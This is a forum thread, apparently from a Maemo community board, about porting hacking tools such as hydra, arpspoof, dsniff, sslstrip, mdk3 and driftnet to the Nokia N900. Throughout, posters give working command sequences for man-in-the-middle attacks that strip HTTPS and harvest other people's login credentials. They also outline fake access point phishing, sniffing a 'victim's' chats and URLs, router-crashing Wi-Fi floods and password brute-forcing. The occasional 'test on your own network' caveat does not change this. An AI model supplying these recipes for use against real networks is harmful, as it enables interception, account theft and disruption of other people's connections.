...WPA decrypting via amazon cloud servers isn't anything special nor new. Roth just used dictionary-then-bruteforce attack on relatively short (6 characers, without special, punctation, etc) password and WPA (not WPA2, important!). He claims, that his modification of dict-bruteforce is 2.5x faster than old methods - this may be one of many small steps forward, but still, decrypting real password with regular lenght and numbers/upercase/lowercase/special combo would take ages. Literally. Not to mention WPA2 ;)

Still, there IS way to crack WPA/WPA2 passwords with silly SSID's and relatively long passwords (although not very long and complicated) - using so-called Rainbow Tables (if You dont know what it is, Wikipedia is Your friend). Succes depends also on table quality, so it's mainly good for VERY thorought prepared attacks. You can even create own tables for custom SSID, but that would take long time of big cloud sever to create. Although, You can even use it with N900 - if You take few terabyte-sized HDs with You and connect them via HEN :) Still, mhz and bus speed (limited USB speed) matters, cause device must go through partially creating (tens/hundreds)MILIONS of passwords, using half-created hashes from database.

Also, many people just use WPA/WPA2 password as delivered with their router from manufacturer, and in many (if not all) cases this password IS somehow related to router's serial number, and "random" SSID is sometimes also delivered from SN. For routers with such algorithm already revealed and NOT fixed/changed by manufacturer in next revision, getting key is easy as a pie and can be calculated in <second. It's really nasty thing, cause it give false aura of security. For router's owner, mostly ;)
[/wifi-hacking-theory-blablabla]

... Anyway, guy with "phone" connected to terabyte HD via cable with USB adapter, doesn't look more suspicious thatn guy with a laptop. No, really. This happen all the time ;)

@r4ste

yes it is possible
and for people who are asking the wpa hack way
it is not public sorry :(
but there is a way with making a fake ap with the same bssid and essid of the targeted network
and prepare a phisher
then continue with dnsspoof and dhcp and apache2

As far as i know inboxs are PRIVATE but if you cant thats a big shame , also when are we looking at these tutorials ..

As far as i know inboxs are PRIVATE but if you cant thats a big shame , also when are we looking at these tutorials ..

But what do You want, citation You quoted tells everything. Anyway, I think that information for educational purposes isn't illegal, but funniest thing is that he DID a almost newbie-proof tutorial for phishing based attack, few pages ago ;)

Still, doesn't try that in home (or outside). Phishing anyone by false web page (even false router prompt) isn't running wifite to crack WEP. If, by any chance, attacked person get more experienced assistance (have pro cousin, son, uncle or whatever) - or just isn't idiot @ the moment of attack, You can get into real troubles very soon. Including meeting with some blue girls and guys. In both meanings of "blue" ;)

Without additional preparations, You leave dozens of traces there, that can be retrieved even months (@ some cases) after attack from victim computer. You've been warned.

Estel is correct

but in my country syria
the don't know what is wireless
they just use it :p
so in my place all the networks besides me are ***** including wpa/wpa2 once

Hydra attack on router
tools
nmap
hydra
result:

anybody can HELP me ???????????????????????
:eek:

anybody can HELP me ???????????????????????
:eek:

maybe if people knows whats wrong we could decide ?

anybody can HELP me ???????????????????????
:eek:

maybe if people knows whats wrong we could decide ?

LOL innit.

What a dunce.

there is any posib to make a hydra gui for n900?

i think there is an gui some where
i have found one many weeks ago but forgot what was it's name
but you can search for it

one question anybody know how we can download the mega upload file when it doesnt work with our browsers ??

use TOR (The Onion router)
search it with google
and use it to download the file from megaupload

it's just like a proxy server

use TOR (The Onion router)
search it with google
and use it to download the file from megaupload

it's just like a proxy server

this is issue im having , which seems like a flash issue but i could be wrong ?

http://dl.dropbox.com/u/10188212/screenshots/Screenshot-20110725-173137.png

problem solved it was my adblock.css uninstalled that an all good .. ..

megaupload has nothing to do with flash thing
it must be an ip thing
if you are in a country just like mine
several people use the same ip
and megaupload has a limited download availability
so megaupload thinks that you have already downloaded while actually an other person downloaded
not you

so TOR gives you another ip address which will allow you to download easily

megaupload has nothing to do with flash thing
it must be an ip thing
if you are in a country just like mine
several people use the same ip
and megaupload has a limited download availability
so megaupload thinks that you have already downloaded while actually an other person downloaded
not you

so TOR gives you another ip address which will allow you to download easily

no matter what connection i use the download link never pops up so cant see it being IP problem my self i use my pc on megaupload all the time ...

thanks again

Thats weird. Megaupload works fine for me and I'm in the UK. Rapidshare can be a tricky to get working but that works eventually.

im just wandering if it has some thing to do with adflashblock-css which i have installed , well thats all i can think of anyways ....

will uninstall it an report back

i don't have any issues downloading that file

im just wandering if it has some thing to do with adflashblock-css which i have installed , well thats all i can think of anyways ....

will uninstall it an report back

That might be the problem as I've never had that installed on my phone.

I ported THC-Hydra (http://www.thc.org/thc-hydra/). If somebody needs it, just install the deb from the attachement ;)

Hello all:

Finally got around to installing Thc Hydra on my N900.
The command line seems to work fine.
When I 'xhydra' I do get the GUI and it will crack my router when I give it the Login and Password.

The problem is:
When I go to open the password list, the GUI crashes and the program closes. I cannot give the 'path' to the word file as the gui dissappears/crashes instantaneously.

I get the 'Dreaded' Segmentation Fault ERROR in xterm.

This is a great program, help me if you know how to fix this.

What Have I done wrong?

Thanks to all.
Lost_bro

same problem here.

hmm haven't tried xhydra yet (the gui)

however you can tell me what the output tells you when the program crashes
i think i might be able to help

Hello Karam

hmm haven't tried xhydra yet (the gui)

however you can tell me what the output tells you when the program crashes
i think i might be able to help

OK, as you know, when you 'xhydra' in xterm, the GUI will open an new window.

The original xterm stays open after the GUI is closed/crashes.

This is the result of trying to input the 'path' to wordlist:
The xhydra GUI crashes and this is the output on xterm.
Let me know it I can offer you any more info regarding the crash.
Take care
Lost_bro

Finally , Neopwn is here in the name of pwnphone
http://www.pwnieexpress.com/pwn_phone.html

Finally , Neopwn is here in the name of pwnphone
http://www.pwnieexpress.com/pwn_phone.html

Fail. Now, go away.

Finally , Neopwn is here in the name of pwnphone
http://www.pwnieexpress.com/pwn_phone.html

hiii,have u got any instalation guide for that:::...

hiii,have u got any instalation guide for that:::...

Download the Pwn Phone Image and the instalation guide is contained within the rar file,

...while still no sane one care for that sh*t, when we got ED, fAircrack, Cleven, etc. So, be gone (neopwn, not You).

cant open link...any link than this one..?

downloading and will upload at another link
this will take a while
i have 256 kb net
upload 10kb/s

EDIT : Uploaded To multiupload
link on 1st post

http://www.backtrack-linux.org/wiki/index.php/DECT_Sniffing_Dedected#Record_the_phone_call

any chance for this program to run on n900. or the is another program to be use with n900.

http://www.backtrack-linux.org/wiki/index.php/DECT_Sniffing_Dedected#Record_the_phone_call

any chance for this program to run on n900. or the is another program to be use with n900.

You'd need an original Dosch&Amand Type II PCMCIA Card an an adapter for that to be useful

Adapter from PCMCIA to USB, or what?

guys that operation is dangerous for N900
it is possible and worked with me but it ended ruining my phone0 interface on N900
so i have replaced it with a new one

you can try if you want but it's on your own risk
PS: i didn't use any external chips/adapters

What procedure? It's physically impossible to sniff DECT via sole N900, lol. No matter how hard You try ;) It's just different standard of communication.

It's just like trying to connect to cable ethernet via N900 WiFi card. You can try and "ruin" as many interfaces as You want but it just won't happen.

Unless I've misunderstood something here, You're pulling our legs ;)

no no you didn't get it
i ment it tried sniffing phone calls using the interface phone0 with wireshark and some other tools

that ended an overload for that interface ----> destroyig it

it is possible and worked with me

So, basically, except for messing up Your system, it *wasn't* "working with You". Obviously, cause it's physically impossible to sniff DECT calls via N900. Are we talking about same thing?

So, basically, except for messing up Your system, it *wasn't* "working with You". Obviously, cause it's physically impossible to sniff DECT calls via N900. Are we talking about same thing?

well i ment sniffing phone calls in general NOT only DECT calls
haven't tried DECT calls
so probably we are not talking about the same thing

So, still I don't get what have worked for You. Cause, obviously, not sniffin *any* calls. The only thing You theoretically *can* try sniffing via phonet is mobile one. Next to impossible, and even if somehow someone succeed, all she/he can get is encrypted data output with no way to decrypt it.

EDIT : removed due illegal instructions -_-

Hm, interesting. I'll investigate it further. Thanks for explaining.

hmm ok Estel i will explain what i did :


then i searched for the networks (GSM) from N900
then choosed the default one that my SIM uses
tried to scan for other GSM receiver
i found 9999999 of numbers
choosed number 555 (that was exactly rhe number i chosed)
wireshark stareted to show me data getting sniffed
after it finished i opened the cap file with multiple decrypters
i could find the number from who to who
also the area both numbers are in
but wasn't able to change the cap into wav(or any sound format)


can you upload the cap file, so we can see what it contains?

my question was for cordless phones from home not for mobiles phones. can we sniff with n900? if yes how ?

Read few last posts, and You'll know the answer.

@mooglez
i'm sorry but that was a loooong time ago
i have reformated my PC and reflashed my N900 many times
i don't thing it is still exists

was wandering if you plan on getting around to them tutorials you mentioned ...


3-)SET social engineering toolkit
Hmm well this is currently not needed if you don't have metasploit3
i will post a tutorial for it later also for metaploit3 and it's full functions

trying to find a good install tutorial for SET you see ...

well currently i don't have time nor N900 to write these tutorial
i wish someone do it instead of me

but when i have the time i may write it
PS also armitage is working perfectly on N900

well currently i don't have time nor N900 to write these tutorial
i wish someone do it instead of me

but when i have the time i may write it
PS also armitage is working perfectly on N900

thats a shame , not herd of armitage to be honest but will look into it ..

karam please upload charon the mdk3 gui aplication

sure but just wait a bit more
till i package it and gather it's depends ;)

If You like so much to create packs of applications, why not to start uploading them to repos? I would pass through Q&A, possibly hammering headache-resulting bugs.

/Estel

i have just finished it
it has mdk3 fully working
with the destruction mode

inshort it can do the ultimate wifi damage attack
but please test it only on your own network
anyone can test it ?
please send a PM

after confirmation .. i will upload it to devel

I can, but don't how soon as I am having exams next week... I can porbably do only little testing. I think estel can give you the feedback you need ;)

after confirmation .. i will upload it to devel

Nice, because that is what I've requested ;) This way, code is openly available, and tools You've ported are suspect of Q&A - it's nice for hammering possible bugs.

Also, it's great chance for disappearance of general (or mainstream, if You like to call it that wait) suspicious stance for Your work - uploading to repos and git or garage, everything should be well documented, and controversial things solved easily.

/Estel

to Unhuman
arpspoof testing working version

Do you know how to fix this

home/opt # ./arpspoof
./arpspoof: error while loading shared libraries: libnet.so.0: cannot open shared object file: No such file or directory
/home/opt #




to Unhuman
arpspoof testing working version

that's what i was actually wanted Unhuman to test ;) (in pm messages)

looks like you did it before him

ok then i will upload requests of it one by one

sudo gainroot
tar xzvf MyDocs/libnet.tar.gz
mv libnet.so.0 /usr/lib



it will ask for another lib
just tell me the name of it

All works fine just need to test it now ....

Version: 2.4
Usage: arpspoof [-i interface] [-t target] host
/home/opt #




i had to use this command to extract it .....


tar xzvf /home/user/MyDocs/libnet.tar.gz




that's what i was actually wanted Unhuman to test ;) (in pm messages)

looks like you did it before him

ok then i will upload requests of it one by one

sudo gainroot
tar xzvf MyDocs/libnet.tar.gz
mv libnet.so.0 /usr/lib



it will ask for another lib
just tell me the name of it

i tried using aircrack and it worked .. so i am asking what is the diffrence between this and aircrack ?
thanks in advance :)

don't forget to :


sudo gainroot
echo "1" > /proc/sys/net/ipv4/ip_forward

or else everything is useless




@davdav

this is completely something different from aircrack
it's MITM same as ettercap but ultra faster

A quick test and all seems ok with the build .....


/arpspoof -i wlan0 -t 192.168.1.3 192.168.1.5
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
^O2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2



cheers

cool

now i will go for charon and destruction mode

ULTRA DANGEROUS

but i will work on it tomorrow ;)


arpspoof should be soon the new depend of yamas script :)

and what does that do ?

Its the same as ettercap but much better and faster
heres a link have a read see what you think ...

http://en.wikipedia.org/wiki/ARP_spoofing

Another good page (http://su2.info/doc/arpspoof.php)

I try arpspoof and is starting.

Thank you
karam and stevomanu

https://github.com/pwnieexpress/Source-Repository

@ karam-- i did apt-get install yamas. then run the icon from the menu. then did as it said in the youtube video of yamas. then i could do it. passwords and login information and website also appeared. can you post a video of each of your hacking tutorials. arp spoofing coz its very hard for a noob to understand what you guys tok abt and also the wiki since i dnt hav any knowledge about linux. but i would love to test al this hacking materials. so please can you give a tutorial with a video or anythng. just for us (noobs). it would be helpful. i kno you are very busy with all your works. so i gues if u could appoint and of the gurus from the thread to just post tutorials. please karam.

omg omg omg omg

i'm so shy from u guys
can some one upload karam.tar.gz to some where ??
i can't download it from mega nor any site uploaded to !!

i need it for packaging libs from it to run arpspoof in repos !

http://dl.dropbox.com/u/44965378/N900%20mods/karam.zip

sorry for the wait ... add link to first page if you like ..


omg omg omg omg

i'm so shy from u guys
can some one upload karam.tar.gz to some where ??
i can't download it from mega nor any site uploaded to !!

i need it for packaging libs from it to run arpspoof in repos !

TO KARAM:

i have talked with other people who has the N900 and MITM attacks no longer wornking in the N900, when you run ettercap or any other program who needs promiscuous mode, the conection get stuck and you can't sniff any packet or navigate with the N900. I have trying to reflash and nothing work, I use:

kernel power 49 with CSSU testing

but i have trying with kernel power 46, 47, 48 and nothing there is some packet or dependency or something thas has screw up the whole promiscuous mode in the N900.

Do you have the same problem??

- Good news!! Recently the projetc ettercap has been reborn after 8 years of no actualization with a new version, ettercap 0.74 lazarus, it is a shame we don have this newer version compile for the N900, i have tried the new version in my desktop pc and runs great.

- I have a question for you, are you developing for the N9 ?? because we still doesn't have in the N9 nothing of pentesting material, no ettercap, no wireshark, no nmap, no arpspoof, no aircrack, no metasploit nothing. I will be great have someone of your expertice and knowledge developing for N9, because with 1 GB of RAM it will be the perfect pentesting mobile machine.

Karam thanks for the great work you are for sure one of the biggest experts in the community.

it's actually true that ettercap makes the connection horrible when using it on N900

that's why i have just finished uploading arpspoof (as package name dsniff)
which is already confirmed to not slowing down the connection as ettercap does especially when running heavy sniffs such as sslstrip and YAMAS script (Based on sslstrip)

soon this problem will be solved for N900 as arpspoof will be the dependency of yamas

and for N9
unfortunately i don't have one

so till i get one (maybe will never)
then i will port hacking tools to it

PS: ettercap re alive is awesome
will contact the author of the ettercap package to port it to N900 (it's very easy to do)

i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS

sudo gainroot

apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber

then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username

@ karam- so arpspoof will just make yamas faster right? karam is it possible to control the hosts? which website they are visiting. redirecting them to something differnt.just for fun.cz i tested it with my pc. it just gives the login info and website. cant do anythng abt it? jst hav to watch it??

and last but not the least- i just love your work man. the speed and battery patches and now this. just proud to be amember of this community. thanks man

yes that's true
and another yes
it's possible

with the same package i uploaded (dsniff)
there is something called dnsspoof
it does the job
but i'll explain later because i don't have enough time now
and i'm honored to be in this community too ;)

PS : dsniff package has those sniffing tools:
arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm

ex : msgsnarf will allow you to sniff chat froma victim
and urlsnarf will get you the urls of the victim
and so on

and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet
puff many work to do
short time i have
but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat

sudo gainroot
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 333
arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1
sslstrip -l 333

No luck...
I can not open no pages ( chrome, firefox) no internet ...

ps
try as well 8080 still no luck

yes that's true
and another yes
it's possible

with the same package i uploaded (dsniff)
there is something called dnsspoof
it does the job
but i'll explain later because i don't have enough time now
and i'm honored to be in this community too ;)

PS : dsniff package has those sniffing tools:
arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm

ex : msgsnarf will allow you to sniff chat froma victim
and urlsnarf will get you the urls of the victim
and so on

and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet
puff many work to do
short time i have
but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat

ok. that would be just great. so i hav to wait for like 4 months to get a tutorial for dsniff? anyone around who can help me a bit to do all that karam has mentioned? thanks. and best of luck karam

it worked with me
is arpspoof -i wlan0 -t router targer ? or only target router?
q6600 maybe your computer is using a proxy

i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS

sudo gainroot

apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber

then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username

i have tested it with arpspoof and it works perfect!! but it work perfect with sslstrip v0.7!!! with sslstrip v0.9 the connection get stuck the majority of times.

How is it going the ettercap 0.74 thing?? you already contact with the maintainer of the packet?? maybe with the new version of ettercap the connection dont get stuck, because altough arpspoof do the job well, ettercap with all is plugins and filters gives a more complete MITM experience :D

I would love to know how to compile pentesting programs to be able to port it to N900 and N9. some tutorial, book o guide you recommend me?? i really admire your contribution to this community.

Hi everyone ! Regarding yamas, please post in the appropriate thread so we can easily follow ;)
http://talk.maemo.org/showthread.php?p=1156260&highlight=yamas#post1156260

Btw, the new version with arpspoof is almost out ;) Unhuman could test it this morning.

Oh, and it seems Karam is the one who ported arpspoof to maemo right ? Good job man ;)

@ All
sorry for taking so long to reply
i'm so busy for about 3 months

@-Tyler-
i haven't yet
but i will now

and i think if you try the already compiled binaries the same ones of N900's
it should work unless it has some library required
so simply place the required ones


@comaX
:) already posted at yamas thread about driftnet and dnsspoof and urlsnarf
check it ;)

great news everyone
i have just finished building and uploading the following packages :

mdk3
charon (mdk3 gui)
driftnet
cowpatty

i have also updated dsniff to include dnsspoof.hosts file (was missing from the initial release)

enjoy everyone ;)

left to do : hamster, airdrop-ng

Are thats a shame my nokia is getting fixed i hope , the usb post came out which im very gutted about back on my n97 for now how crap is that ...

great work thou as always

icedtea is installed from the repo but i get


Nokia-N900:~# apt-get install -f charon
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
charon: Depends: Icedtea6 but it is not installable
E: Broken packages
Nokia-N900:~#

omg what a typo

it should be small i instead of big I

this is the silliest typo i have ever mistaken with
i will fix this now
thank you for reporting this

//EDIT:
uploaded a fixed version of charon

Hi Karam
I have the same error, i will later to install charon.

charon runs fine but it is in french any chance to change it ?
:-)

Now is working.
Same request like awett, plus the gui is so small i can not see much.
best regards

it seems there is another a typo in the latest set of 'security' tools in the repo: now in the binary "/opt/driftnet/drifnet". No 't' in the executable name :)

btw, should that one work fine ? I ran "/opt/driftnet/drifnet -v -i wlan0" but it seems it's only seeing the local traffic, not switching into promiscuous mode.
Does one first need to do the iwconfig first to switch it to monitor mode? I though that was done in the driftnet program itself?

PS. this is on my own network, I have the WPA2 key, I just wanna see how good it works:) The phone is runing power49.

Running Charon is not always easy either, as it's crashing often.

Thanks anyway for the effort.

there must be a way to change it to english
however i can't do this my self as i have 0 expert with java things
wish someone can do that instead of me

and @q6600
so small ?
it has every kind of usage of mdk3
the point of it is to run many attacks together
like the destruction mode
it leads to a crash of a router


@Netweaver
oops didn't see your post
anyway
you must run arpspoof before using driftnet to see others traffic

and charon crashes are caused by icedtea6 as it's unstable

@Karam
you miss understood me, i was referring to the fonts on the gui i can not see much.

again
i say it is icedtea6 problem

i run charon using j2me from easy debian
it has full font and no crashes

hmmm...

when i try to run charon from xterm it asks for a password....any hints?

you are running it as root :)

run it as user because the launching script has : sudo

Karam,
Nope, I am not running it as root and keeps asking for password.
any other hints?

karam,thank you port these great hack tool to N900,
very like.

if you have free time, can you port THC-hydra7.2 to N900,
i think it will welcome
http://www.thc.org/thc-hydra/

have other question,i installed metasploit on N900,
but how let in support db command,
i try execute :gem1.8 install mysql , but failed

hydra is already ported
check the first post attachements

and about db support
you will need to have gcc and other tools to compile

not sure : but there is an app called tinygcc or somthing (development section)

however i don't recommend using this on N900
i have tried it once
veeeeeeeery slow
plus if any crash happened
the whole of /home partition is corrupted
it will lead to a reflash

@gorgezilla

as root :

java -jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar

as user :

/usr/bin/charon

the shortcut works fine right ?

kararm, i know ,but the latest hydra version is 7.2,
fix a lot bug , speen-up,add some services to support.
thanks ,i will install gcc to try it ,
thank your hard work.

why do i get 'permission denied' when i run mdk3 or charon even when i'm root.

sry about that
fixing it now

seems that there was (chown) error as i moved them from my N900 directly from MyDocs

as for new hydra well i can't compile anything now, i don't have time nor the good environment to do so

sry about that
fixing it now

seems that there was (chown) error as i moved them from my N900 directly from MyDocs

as for new hydra well i can't compile anything now, i don't have time nor the good environment to do so

Compiled version of hydra 7.2 attached. This one does not have support for the following services: postgres sapr3 firebird afp ncp ssh svn oracle mysql5 and regex.

cannot complete it.. I encountered an error on Part 1.. stucked at step

"Now download karam.tar.gz from :
http://dl.dropbox.com/u/44965378/N900%20mods/karam.zip

Then put in MyDocs and :
-------
cd /home/user/MyDocs
tar -xzvf karam.tar.gz
-------
To have all needed files"

somebody help to complete this step by step..

@StefanL
thank you for compiling it


@i don't recommend using that method
i have uploaded most of the tools to extras-devel

//edit 1st post edited , thread subject changed

@StefanL
thank you for compiling it

The attached version has some more modules enabled and also contains pw-inspector. Now the list of services not compiled in is: sapr3 firebird afp ncp ssh svn oracle. ;)

tell me if i have done it correctly or not..

BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ sudo gainroot
Root shell enabled


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user #
/home/user # apt-get install nmap driftnet charon yamas wireshark tshark kismet cleven cowpatty
Reading package lists... Done
Building dependency tree
Reading state information... Done
nmap is already the newest version.
wireshark is already the newest version.
tshark is already the newest version.
kismet is already the newest version.
The following extra packages will be installed:
busybox-power dsniff ettercap ettercap-common libjpeg7
libnet0 libnet1 libssl0.9.7 macchanger mdk3 sslstrip
Suggested packages:
reaver wash
The following NEW packages will be installed:
busybox-power charon cleven cowpatty driftnet dsniff
ettercap ettercap-common libjpeg7 libnet0 libnet1
libssl0.9.7 macchanger mdk3 sslstrip yamas
0 upgraded, 16 newly installed, 0 to remove and 58 not upgraded.
Need to get 5557kB of archives.
After this operation, 12.0MB of additional disk space will be used.
Do you want to continue [Y/n]? Y
Get:1 http://repository.maemo.org fremantle/free mdk3 1.1 [48.5kB]
Get:2 http://repository.maemo.org fremantle/free charon 1.1 [1533kB]
Get:3 http://repository.maemo.org fremantle/free cowpatty 1.1 [15.5kB]
Get:4 http://repository.maemo.org fremantle/free libjpeg7 7-1.maemo5v1 [135kB]
Get:5 http://repository.maemo.org fremantle/free driftnet 1.2 [20.1kB]
Get:6 http://repository.maemo.org fremantle/free libnet0 1.0 [13.6kB]
Get:7 http://repository.maemo.org fremantle/free libssl0.9.7 1.0 [433kB]
Get:8 http://repository.maemo.org fremantle/free dsniff 1.2 [1879kB]
Get:9 http://repository.maemo.org fremantle/free libnet1 1.1.4-2maemo2 [56.7kB]
Get:10 http://repository.maemo.org fremantle/free ettercap-common 1:0.7.3-2maemo4 [310kB]
Get:11 http://repository.maemo.org fremantle/free ettercap 1:0.7.3-2maemo4 [188kB]
Get:12 http://repository.maemo.org fremantle/free sslstrip 0.9-0maemo1 [24.6kB]
Get:13 http://repository.maemo.org fremantle/free busybox-power 1.19.3power5 [517kB]
Get:14 http://repository.maemo.org fremantle-1.3/free macchanger 1.5.0-4 [90.2kB]
Get:15 http://repository.maemo.org fremantle-1.3/free cleven 2.4-8 [269kB]
Get:16 http://repository.maemo.org fremantle/free yamas 1.0.0-1 [23.1kB]
Fetched 5557kB in 54s (101kB/s)
Selecting previously deselected package mdk3.
(Reading database ... 32890 files and directories currently installed.)
Unpacking mdk3 (from .../archives/mdk3_1.1_armel.deb) ...
Selecting previously deselected package charon.
Unpacking charon (from .../archives/charon_1.1_armel.deb) ...
Selecting previously deselected package cowpatty.
Unpacking cowpatty (from .../cowpatty_1.1_armel.deb) ...
Selecting previously deselected package libjpeg7.
Unpacking libjpeg7 (from .../libjpeg7_7-1.maemo5v1_armel.deb) ...
Selecting previously deselected package driftnet.
Unpacking driftnet (from .../driftnet_1.2_armel.deb) ...
Selecting previously deselected package libnet0.
Unpacking libnet0 (from .../archives/libnet0_1.0_armel.deb) ...
Selecting previously deselected package libssl0.9.7.
Unpacking libssl0.9.7 (from .../libssl0.9.7_1.0_armel.deb) ...
Selecting previously deselected package dsniff.
Unpacking dsniff (from .../archives/dsniff_1.2_armel.deb) ...
Selecting previously deselected package libnet1.
Unpacking libnet1 (from .../libnet1_1.1.4-2maemo2_armel.deb) ...
Selecting previously deselected package ettercap-common.
Unpacking ettercap-common (from .../ettercap-common_1%3a0.7.3-2maemo4_armel.deb) ...
Selecting previously deselected package ettercap.
Unpacking ettercap (from .../ettercap_1%3a0.7.3-2maemo4_armel.deb) ...
Selecting previously deselected package sslstrip.
Unpacking sslstrip (from .../sslstrip_0.9-0maemo1_all.deb) ...
Selecting previously deselected package busybox-power.
Unpacking busybox-power (from .../busybox-power_1.19.3power5_armel.deb) ...
busybox-power: Maemo (N900) environment detected
Selecting previously deselected package macchanger.
Unpacking macchanger (from .../macchanger_1.5.0-4_armel.deb) ...
Selecting previously deselected package cleven.
Unpacking cleven (from .../cleven_2.4-8_armel.deb) ...
BEGIN preinstall@2.4-8: install
END preinstall@2.4-8: install
Selecting previously deselected package yamas.
Unpacking yamas (from .../yamas_1.0.0-1_armel.deb) ...
Setting up mdk3 (1.1) ...
Setting up charon (1.1) ...
Setting up cowpatty (1.1) ...
Setting up libjpeg7 (7-1.maemo5v1) ...
Setting up driftnet (1.2) ...
Setting up libnet0 (1.0) ...
Setting up libssl0.9.7 (1.0) ...
Setting up dsniff (1.2) ...
Setting up libnet1 (1.1.4-2maemo2) ...
Setting up ettercap-common (1:0.7.3-2maemo4) ...
Setting up ettercap (1:0.7.3-2maemo4) ...
Setting up sslstrip (0.9-0maemo1) ...
Setting up busybox-power (1.19.3power5) ...
Setting up macchanger (1.5.0-4) ...
Setting up cleven (2.4-8) ...
BEGIN postinstall@2.4-8: configure
Listing /opt/cleven/ ...
Compiling /opt/cleven/clevenCaptureUI.py ...
Compiling /opt/cleven/clevenDictionaryUI.py ...
Compiling /opt/cleven/clevenDriversUI.py ...
Compiling /opt/cleven/clevenKeysUI.py ...
Compiling /opt/cleven/clevenMain.py ...
Compiling /opt/cleven/clevenMainUI.py ...
Compiling /opt/cleven/clevenManageCapturedUI.py ...
Compiling /opt/cleven/clevenStartupUI.py ...
Listing /opt/cleven/compat-wireless ...
END postinstall@2.4-8: configure
Setting up yamas (1.0.0-1) ...
/home/user #

:)

how to use driftnet? any tutorial? plz

The attached version has one more module enabled (ssh) and also contains pw-inspector. Now the list of services not compiled in is: sapr3 firebird afp ncp svn oracle. ;).

Please test and provide some feed-back, since I am not actually using this; only compiled it since Karam's development system is borked.

is der anyone who successfully used driftnet. can you please share how to use that. i am nt being able to get it work out. plzz anyone help

The attached version has one more module enabled (ssh) and also contains pw-inspector. Now the list of services not compiled in is: sapr3 firebird afp ncp svn oracle. ;).

Please test and provide some feed-back, since I am not actually using this; only compiled it since Karam's development system is borked.

HI ive tried hydra 7.2 i have a problem when i run hydra i get an error
saying:libssl1.so.1.0.0 cannot open shared object file no such file or directory can you help thanks

The second uploaded version of hydra 7.2 is not working ( like in the PM StefanL) i had the same error like spuddy101. I install back the first version uploaded by stefanl on post 201.

hmm it seems it's grabbed by debian repository (binary or source)

if you have libss1 installed then do :

ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl1.so.1.0.0

not sure as i have hydra installed on easy-debian

hmm it seems it's grabbed by debian repository (binary or source)

if you have libss1 installed then do :

ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl1.so.1.0.0

not sure as i have hydra installed on easy-debian

My N900 is my development environment so I do not have a fresh one to test the programs on; obviously on my set-up all the dependencies are satisfied since it compiled. :(

Try the following to fix missing dependenciessudo apt-get install libssh libmysqlclient libpq libssl pkg-config libgtk2.0Just try each of the packages after the install separately until you find the one that fixes the dependency. Report back here to let us know what works.

hi StefanL,i download your attached on #207.
but it must install some lib.
when i execute below command,hydra can work.
1,apt-get install libidn11 libpq5 libssh2-1 libcrypt
2,ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl.so.1.0.0
3,ln -s /usr/lib/libssh2.so.1 /usr/lib/libssh.so.4
4,ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.1.0.0

i used valid login/password pairs test it on My N900's sshd and telnet server.but hydra can't suggest valid !

Nokia-N900:~# hydra -l root -p qazwsx 127.0.0.1 ssh
Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

